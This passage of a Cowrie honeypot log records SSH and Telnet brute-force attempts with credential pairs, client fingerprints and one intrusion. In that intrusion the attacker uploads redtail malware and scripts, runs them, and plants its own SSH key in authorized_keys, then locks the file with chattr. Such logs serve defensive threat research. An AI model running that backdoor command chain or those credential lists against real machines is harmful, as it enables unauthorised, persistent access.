512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T16:41:57.292808Z","src_ip":"212.227.235.229","session":"e613220f8ce3"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:41:57.688703Z","src_ip":"212.227.235.229","session":"e613220f8ce3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T16:41:57.820886Z","session":"e613220f8ce3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54848,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d7086040a7f","protocol":"ssh","message":"New connection: 212.227.235.229:54848 (1.2.3.4:22) [session: 1d7086040a7f]","sensor":"my-vps","timestamp":"2025-08-26T16:42:41.116214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:42:41.907825Z","src_ip":"212.227.235.229","session":"1d7086040a7f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T16:42:41.908547Z","src_ip":"212.227.235.229","session":"1d7086040a7f"}
{"eventid":"cowrie.login.success","username":"root","password":"space","message":"login attempt [root/space] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:42:45.778504Z","src_ip":"212.227.235.229","session":"1d7086040a7f"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:42:46.550316Z","src_ip":"212.227.235.229","session":"1d7086040a7f"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:43:07.160988Z","src_ip":"212.227.235.229","session":"e613220f8ce3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57028,"dst_ip":"1.2.3.4","dst_port":22,"session":"d73e5f312796","protocol":"ssh","message":"New connection: 212.227.235.229:57028 (1.2.3.4:22) [session: d73e5f312796]","sensor":"my-vps","timestamp":"2025-08-26T16:43:19.101281Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T16:43:19.102303Z","src_ip":"212.227.235.229","session":"d73e5f312796"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T16:43:19.230181Z","src_ip":"212.227.235.229","session":"d73e5f312796"}
{"eventid":"cowrie.login.failed","username":"a","password":"1","message":"login attempt [a/1] failed","sensor":"my-vps","timestamp":"2025-08-26T16:43:19.846520Z","src_ip":"212.227.235.229","session":"d73e5f312796"}
{"eventid":"cowrie.login.failed","username":"a","password":"abc123","message":"login attempt [a/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T16:43:20.976686Z","src_ip":"212.227.235.229","session":"d73e5f312796"}
{"eventid":"cowrie.login.failed","username":"a","password":"abcd123","message":"login attempt [a/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-26T16:43:22.106503Z","src_ip":"212.227.235.229","session":"d73e5f312796"}
{"eventid":"cowrie.login.failed","username":"a","password":"abcd1234","message":"login attempt [a/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-26T16:43:23.236636Z","src_ip":"212.227.235.229","session":"d73e5f312796"}
{"eventid":"cowrie.login.failed","username":"a","password":"abc1234","message":"login attempt [a/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-26T16:43:24.366596Z","src_ip":"212.227.235.229","session":"d73e5f312796"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:43:25.496784Z","src_ip":"212.227.235.229","session":"d73e5f312796"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":50369,"dst_ip":"1.2.3.4","dst_port":23,"session":"1fd7f6e71b3f","protocol":"telnet","message":"New connection: 123.31.39.100:50369 (1.2.3.4:23) [session: 1fd7f6e71b3f]","sensor":"my-vps","timestamp":"2025-08-26T16:43:34.098689Z"}
{"eventid":"cowrie.session.closed","duration":46.142353773117065,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:44:20.240941Z","src_ip":"123.31.39.100","session":"1fd7f6e71b3f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51272,"dst_ip":"1.2.3.4","dst_port":23,"session":"4282509bd020","protocol":"telnet","message":"New connection: 212.227.235.229:51272 (1.2.3.4:23) [session: 4282509bd020]","sensor":"my-vps","timestamp":"2025-08-26T16:44:28.877748Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57352,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb007bdcdbd6","protocol":"ssh","message":"New connection: 217.72.205.35:57352 (1.2.3.4:22) [session: fb007bdcdbd6]","sensor":"my-vps","timestamp":"2025-08-26T16:44:29.233073Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:44:29.234356Z","src_ip":"217.72.205.35","session":"fb007bdcdbd6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:44:29.555433Z","src_ip":"212.227.125.160","session":"f30b69c72722"}
{"eventid":"cowrie.session.closed","duration":180.1645588874817,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:44:29.564114Z","src_ip":"212.227.125.160","session":"f30b69c72722"}
{"eventid":"cowrie.session.closed","duration":31.27995538711548,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:45:00.157629Z","src_ip":"212.227.235.229","session":"4282509bd020"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":47940,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3064b072397","protocol":"ssh","message":"New connection: 193.32.162.145:47940 (1.2.3.4:22) [session: b3064b072397]","sensor":"my-vps","timestamp":"2025-08-26T16:45:29.075061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:45:29.076003Z","src_ip":"193.32.162.145","session":"b3064b072397"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T16:45:29.106289Z","src_ip":"193.32.162.145","session":"b3064b072397"}
{"eventid":"cowrie.login.failed","username":"jito","password":"jito","message":"login attempt [jito/jito] failed","sensor":"my-vps","timestamp":"2025-08-26T16:45:29.205800Z","src_ip":"193.32.162.145","session":"b3064b072397"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:45:30.238257Z","src_ip":"193.32.162.145","session":"b3064b072397"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56677,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4516175b022","protocol":"ssh","message":"New connection: 212.227.235.229:56677 (1.2.3.4:22) [session: b4516175b022]","sensor":"my-vps","timestamp":"2025-08-26T16:45:31.443290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T16:45:31.444008Z","src_ip":"212.227.235.229","session":"b4516175b022"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T16:45:31.552093Z","src_ip":"212.227.235.229","session":"b4516175b022"}
{"eventid":"cowrie.login.failed","username":"admin","password":"r4e3w2q1","message":"login attempt [admin/r4e3w2q1] failed","sensor":"my-vps","timestamp":"2025-08-26T16:45:32.057320Z","src_ip":"212.227.235.229","session":"b4516175b022"}
{"eventid":"cowrie.login.failed","username":"admin","password":"quake3","message":"login attempt [admin/quake3] failed","sensor":"my-vps","timestamp":"2025-08-26T16:45:33.164945Z","src_ip":"212.227.235.229","session":"b4516175b022"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qqqqqqqqqq","message":"login attempt [admin/qqqqqqqqqq] failed","sensor":"my-vps","timestamp":"2025-08-26T16:45:34.271247Z","src_ip":"212.227.235.229","session":"b4516175b022"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qazwsxedc1","message":"login attempt [admin/qazwsxedc1] failed","sensor":"my-vps","timestamp":"2025-08-26T16:45:35.380816Z","src_ip":"212.227.235.229","session":"b4516175b022"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qazplm","message":"login attempt [admin/qazplm] failed","sensor":"my-vps","timestamp":"2025-08-26T16:45:36.488613Z","src_ip":"212.227.235.229","session":"b4516175b022"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:45:37.597274Z","src_ip":"212.227.235.229","session":"b4516175b022"}
{"eventid":"cowrie.session.connect","src_ip":"101.36.123.102","src_port":57406,"dst_ip":"1.2.3.4","dst_port":22,"session":"50902bac7a7e","protocol":"ssh","message":"New connection: 101.36.123.102:57406 (1.2.3.4:22) [session: 50902bac7a7e]","sensor":"my-vps","timestamp":"2025-08-26T16:45:45.223607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T16:45:45.225544Z","src_ip":"101.36.123.102","session":"50902bac7a7e"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-26T16:45:45.478932Z","src_ip":"101.36.123.102","session":"50902bac7a7e"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin1234","message":"login attempt [root/Admin1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:45:46.264030Z","src_ip":"101.36.123.102","session":"50902bac7a7e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.143.51","src_port":59404,"dst_ip":"1.2.3.4","dst_port":22,"session":"2073b58a42a0","protocol":"ssh","message":"New connection: 213.209.143.51:59404 (1.2.3.4:22) [session: 2073b58a42a0]","sensor":"my-vps","timestamp":"2025-08-26T16:45:46.505823Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:45:46.506496Z","src_ip":"213.209.143.51","session":"2073b58a42a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T16:45:46.527007Z","src_ip":"213.209.143.51","session":"2073b58a42a0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:45:46.530272Z","src_ip":"101.36.123.102","session":"50902bac7a7e"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin1234","message":"login attempt [root/Admin1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:45:46.587850Z","src_ip":"213.209.143.51","session":"2073b58a42a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:45:51.016462Z","src_ip":"213.209.143.51","session":"2073b58a42a0"}
{"eventid":"cowrie.command.input","input":"chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","message":"CMD: chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","sensor":"my-vps","timestamp":"2025-08-26T16:45:51.017593Z","src_ip":"213.209.143.51","session":"2073b58a42a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","size":80,"shasum":"4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:45:51.040015Z","src_ip":"213.209.143.51","session":"2073b58a42a0"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-08-26T16:45:51.061180Z","src_ip":"213.209.143.51","session":"2073b58a42a0"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-08-26T16:45:51.063480Z","src_ip":"213.209.143.51","session":"2073b58a42a0"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-08-26T16:45:51.066186Z","src_ip":"213.209.143.51","session":"2073b58a42a0"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-08-26T16:45:51.069291Z","src_ip":"213.209.143.51","session":"2073b58a42a0"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-08-26T16:45:51.072090Z","src_ip":"213.209.143.51","session":"2073b58a42a0"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-08-26T16:45:51.073061Z","src_ip":"213.209.143.51","session":"2073b58a42a0"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:45:51.094119Z","src_ip":"213.209.143.51","session":"2073b58a42a0"}
